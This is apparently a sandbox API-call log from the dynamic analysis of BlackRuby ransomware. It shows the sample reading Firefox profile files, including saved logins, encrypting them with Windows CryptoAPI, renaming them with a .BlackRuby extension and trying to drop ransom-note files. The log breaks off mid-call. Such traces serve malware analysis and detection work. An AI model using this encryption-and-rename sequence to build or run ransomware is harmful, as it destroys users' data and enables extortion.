[0054.709] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.710] GetLastError () returned 0x0 [0054.710] GetFileType (hFile=0x184) returned 0x1 [0054.710] SetErrorMode (uMode=0x0) returned 0x1 [0054.710] GetFileType (hFile=0x184) returned 0x1 [0054.710] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x24b [0054.710] GetLastError () returned 0x0 [0054.710] ReadFile (in: hFile=0x184, lpBuffer=0x1c31630, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x1c31630*, lpNumberOfBytesRead=0x18eb68*=0x24b, lpOverlapped=0x0) returned 1 [0054.711] GetLastError () returned 0x0 [0054.711] CloseHandle (hObject=0x184) returned 1 [0054.711] GetLastError () returned 0x0 [0054.711] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", lpFilePart=0x0) returned 0x5a [0054.711] GetLastError () returned 0x0 [0054.711] SetErrorMode (uMode=0x1) returned 0x0 [0054.711] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xbf3cf00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0xbf3cf00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x24b)) returned 1 [0054.711] GetLastError () returned 0x0 [0054.711] SetErrorMode (uMode=0x0) returned 0x1 [0054.711] CryptAcquireContextW (in: phProv=0x18eb30, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18eb30*=0x37c708) returned 1 [0054.711] GetLastError () returned 0x0 [0054.782] CryptImportKey (in: hProv=0x37c708, pbData=0x1c8cc88, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360e20) returned 1 [0054.782] GetLastError () returned 0x0 [0054.782] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.782] GetLastError () returned 0x0 [0054.787] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptDuplicateKey (in: hKey=0x360e20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360f60) returned 1 [0054.787] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1cb9cd4*=0x1, dwFlags=0x0) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1cb9ca0, dwFlags=0x0) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cb9d1c*, pdwDataLen=0x18eb58*=0x340, dwBufLen=0x340 | out: pbData=0x1cb9d1c*, pdwDataLen=0x18eb58*=0x340) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cba3c8*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1cba3c8*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cba3f8*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1cba3f8*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.787] GetLastError () returned 0x0 [0054.787] CryptDestroyKey (hKey=0x360e20) returned 1 [0054.787] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.787] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0054.787] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", lpFilePart=0x0) returned 0x5a [0054.787] GetLastError () returned 0x0 [0054.787] SetErrorMode (uMode=0x1) returned 0x0 [0054.787] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.788] GetLastError () returned 0xb7 [0054.788] GetFileType (hFile=0x184) returned 0x1 [0054.788] SetErrorMode (uMode=0x0) returned 0x1 [0054.788] GetFileType (hFile=0x184) returned 0x1 [0054.789] CloseHandle (hObject=0x184) returned 1 [0054.789] GetLastError () returned 0xb7 [0054.789] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js", lpFilePart=0x0) returned 0x5a [0054.789] GetLastError () returned 0xb7 [0054.789] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Y3LQey09msVFgLljmfdpiCQ4ShgUEbGv3SodgPYZ7rv.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Y3LQey09msVFgLljmfdpiCQ4ShgUEbGv3SodgPYZ7rv.BlackRuby", lpFilePart=0x0) returned 0x8a [0054.789] GetLastError () returned 0xb7 [0054.789] SetErrorMode (uMode=0x1) returned 0x0 [0054.789] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe9c30810, ftCreationTime.dwHighDateTime=0x1d2fb2e, ftLastAccessTime.dwLowDateTime=0xbf3cf00, ftLastAccessTime.dwHighDateTime=0x1d2fb2f, ftLastWriteTime.dwLowDateTime=0x28d8ad00, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x350)) returned 1 [0054.789] GetLastError () returned 0xb7 [0054.789] SetErrorMode (uMode=0x0) returned 0x1 [0054.789] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\sessionstore.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\sessionstore.js"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_Y3LQey09msVFgLljmfdpiCQ4ShgUEbGv3SodgPYZ7rv.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_y3lqey09msvfglljmfdpicq4shguebgv3sodgpyz7rv.blackruby")) returned 1 [0054.790] GetLastError () returned 0xb7 [0054.790] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.790] GetLastError () returned 0xb7 [0054.790] SetErrorMode (uMode=0x1) returned 0x0 [0054.790] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.790] GetLastError () returned 0x5 [0054.791] SetErrorMode (uMode=0x0) returned 0x1 [0054.791] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", lpFilePart=0x0) returned 0x59 [0054.791] GetLastError () returned 0x5 [0054.791] SetErrorMode (uMode=0x1) returned 0x0 [0054.791] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x1cd942c | out: lpFileInformation=0x1cd942c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86ddca20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86ddca20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x8817ffa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x50000)) returned 1 [0054.794] GetLastError () returned 0x5 [0054.794] SetErrorMode (uMode=0x0) returned 0x1 [0054.794] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", lpFilePart=0x0) returned 0x59 [0054.794] GetLastError () returned 0x5 [0054.794] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", lpFilePart=0x0) returned 0x59 [0054.794] GetLastError () returned 0x5 [0054.794] SetErrorMode (uMode=0x1) returned 0x0 [0054.794] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.794] GetLastError () returned 0x0 [0054.794] GetFileType (hFile=0x184) returned 0x1 [0054.794] SetErrorMode (uMode=0x0) returned 0x1 [0054.794] GetFileType (hFile=0x184) returned 0x1 [0054.794] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x50000 [0054.794] GetLastError () returned 0x0 [0054.795] ReadFile (in: hFile=0x184, lpBuffer=0x2ae8450, nNumberOfBytesToRead=0x50000, lpNumberOfBytesRead=0x18eb68, lpOverlapped=0x0 | out: lpBuffer=0x2ae8450*, lpNumberOfBytesRead=0x18eb68*=0x50000, lpOverlapped=0x0) returned 1 [0054.823] GetLastError () returned 0x0 [0054.823] CloseHandle (hObject=0x184) returned 1 [0054.824] GetLastError () returned 0x0 [0054.826] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", nBufferLength=0x105, lpBuffer=0x18e71c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", lpFilePart=0x0) returned 0x59 [0054.826] GetLastError () returned 0x0 [0054.826] SetErrorMode (uMode=0x1) returned 0x0 [0054.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebd0 | out: lpFileInformation=0x18ebd0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86ddca20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86ddca20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x8817ffa0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x50000)) returned 1 [0054.826] GetLastError () returned 0x0 [0054.826] SetErrorMode (uMode=0x0) returned 0x1 [0054.863] GetWriteWatch (in: dwFlags=0x0, lpBaseAddress=0x6d60020, dwRegionSize=0x21fe0, lpAddresses=0x6d418578, lpdwCount=0x18e8f8, lpdwGranularity=0x18e8f0 | out: lpAddresses=0x6d418578*=0x6d60000, lpdwCount=0x18e8f8, lpdwGranularity=0x18e8f0) returned 0x0 [0054.867] CryptImportKey (in: hProv=0x37c818, pbData=0x1b3e1d8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18eb0c | out: phKey=0x18eb0c*=0x360ee0) returned 1 [0054.867] GetLastError () returned 0x0 [0054.867] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.867] GetLastError () returned 0x0 [0054.872] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.872] GetLastError () returned 0x0 [0054.872] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eac8 | out: phKey=0x18eac8*=0x360d20) returned 1 [0054.872] CryptContextAddRef (hProv=0x37c818, pdwReserved=0x0, dwFlags=0x0) returned 1 [0054.872] GetLastError () returned 0x0 [0054.873] CryptSetKeyParam (hKey=0x360d20, dwParam=0x4, pbData=0x1b6b224*=0x1, dwFlags=0x0) returned 1 [0054.873] GetLastError () returned 0x0 [0054.873] CryptSetKeyParam (hKey=0x360d20, dwParam=0x1, pbData=0x1b6b1f0, dwFlags=0x0) returned 1 [0054.873] GetLastError () returned 0x0 [0054.874] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2b88590*, pdwDataLen=0x18eb58*=0x50100, dwBufLen=0x50100 | out: pbData=0x2b88590*, pdwDataLen=0x18eb58*=0x50100) returned 1 [0054.876] GetLastError () returned 0x0 [0054.878] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6b280*, pdwDataLen=0x18eb70*=0x10, dwBufLen=0x10 | out: pbData=0x1b6b280*, pdwDataLen=0x18eb70*=0x10) returned 1 [0054.878] GetLastError () returned 0x0 [0054.878] CryptEncrypt (in: hKey=0x360d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b6b2b0*, pdwDataLen=0x18eb78*=0x0, dwBufLen=0x10 | out: pbData=0x1b6b2b0*, pdwDataLen=0x18eb78*=0x10) returned 1 [0054.878] GetLastError () returned 0x0 [0054.884] CryptDestroyKey (hKey=0x360ee0) returned 1 [0054.884] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.884] CryptReleaseContext (hProv=0x37c818, dwFlags=0x0) returned 1 [0054.884] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", nBufferLength=0x105, lpBuffer=0x18e614, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", lpFilePart=0x0) returned 0x59 [0054.884] GetLastError () returned 0x0 [0054.884] SetErrorMode (uMode=0x1) returned 0x0 [0054.884] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.887] GetLastError () returned 0xb7 [0054.887] GetFileType (hFile=0x184) returned 0x1 [0054.888] SetErrorMode (uMode=0x0) returned 0x1 [0054.888] GetFileType (hFile=0x184) returned 0x1 [0054.893] CloseHandle (hObject=0x184) returned 1 [0054.893] GetLastError () returned 0xb7 [0054.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite", lpFilePart=0x0) returned 0x59 [0054.893] GetLastError () returned 0xb7 [0054.893] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_q3BPveod5O8B5RqpRBeCXvuAGeJA9wlKMwqf4K.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_q3BPveod5O8B5RqpRBeCXvuAGeJA9wlKMwqf4K.BlackRuby", lpFilePart=0x0) returned 0x85 [0054.893] GetLastError () returned 0xb7 [0054.893] SetErrorMode (uMode=0x1) returned 0x0 [0054.893] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), fInfoLevelId=0x0, lpFileInformation=0x18ebb8 | out: lpFileInformation=0x18ebb8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x86ddca20, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x86ddca20, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x28e956a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x50110)) returned 1 [0054.893] GetLastError () returned 0xb7 [0054.893] SetErrorMode (uMode=0x0) returned 0x1 [0054.893] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\signons.sqlite" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\signons.sqlite"), lpNewFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\Encrypted_q3BPveod5O8B5RqpRBeCXvuAGeJA9wlKMwqf4K.BlackRuby" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\encrypted_q3bpveod5o8b5rqprbecxvuageja9wlkmwqf4k.blackruby")) returned 1 [0054.893] GetLastError () returned 0xb7 [0054.894] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.894] GetLastError () returned 0xb7 [0054.894] SetErrorMode (uMode=0x1) returned 0x0 [0054.894] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.894] GetLastError () returned 0x5 [0054.895] SetErrorMode (uMode=0x0) returned 0x1 [0054.895] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\times.json", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\times.json", lpFilePart=0x0) returned 0x55 [0054.895] GetLastError () returned 0x5 [0054.895] SetErrorMode (uMode=0x1) returned 0x0 [0054.895] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\times.json" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\times.json"), fInfoLevelId=0x0, lpFileInformation=0x1b888cc | out: lpFileInformation=0x1b888cc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7b79aeb0, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x7b79aeb0, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0x7b79aeb0, ftLastWriteTime.dwHighDateTime=0x1d2da1b, nFileSizeHigh=0x0, nFileSizeLow=0x1d)) returned 1 [0054.895] GetLastError () returned 0x5 [0054.895] SetErrorMode (uMode=0x0) returned 0x1 [0054.896] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x63 [0054.896] GetLastError () returned 0x5 [0054.896] SetErrorMode (uMode=0x1) returned 0x0 [0054.896] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0054.896] GetLastError () returned 0x5 [0054.898] SetErrorMode (uMode=0x0) returned 0x1 [0054.898] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", nBufferLength=0x105, lpBuffer=0x18e770, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", lpFilePart=0x0) returned 0x60 [0054.898] GetLastError () returned 0x5 [0054.898] SetErrorMode (uMode=0x1) returned 0x0 [0054.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), fInfoLevelId=0x0, lpFileInformation=0x1ba673c | out: lpFileInformation=0x1ba673c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8868ee60, ftCreationTime.dwHighDateTime=0x1d2da1b, ftLastAccessTime.dwLowDateTime=0x8868ee60, ftLastAccessTime.dwHighDateTime=0x1d2da1b, ftLastWriteTime.dwLowDateTime=0xb486c00, ftLastWriteTime.dwHighDateTime=0x1d2fb2f, nFileSizeHigh=0x0, nFileSizeLow=0x9a)) returned 1 [0054.898] GetLastError () returned 0x5 [0054.899] SetErrorMode (uMode=0x0) returned 0x1 [0054.899] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", nBufferLength=0x105, lpBuffer=0x18e738, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", lpFilePart=0x0) returned 0x60 [0054.899] GetLastError () returned 0x5 [0054.899] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", nBufferLength=0x105, lpBuffer=0x18e60c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt", lpFilePart=0x0) returned 0x60 [0054.899] GetLastError () returned 0x5 [0054.899] SetErrorMode (uMode=0x1) returned 0x0 [0054.903] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\h231daer.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\mozilla\\firefox\\profiles\\h231daer.default\\urlclassifierkey3.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0054.903] GetLastError () returned 0x0 [0054.903] GetFileType (hFile=0x184) returned 0x1 [0054.903] SetErrorMode (uMode=0x0) returned 0x1 [0054.903] GetFileType (hFile=0x184) returned 0x1 [0054.903] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ebc0 | out: lpFileSizeHigh=0x18ebc0*=0x0) returned 0x9a [0054.903] GetLastError () returned 0x0 [0054.903] ReadFile (in: hFile=0x184, 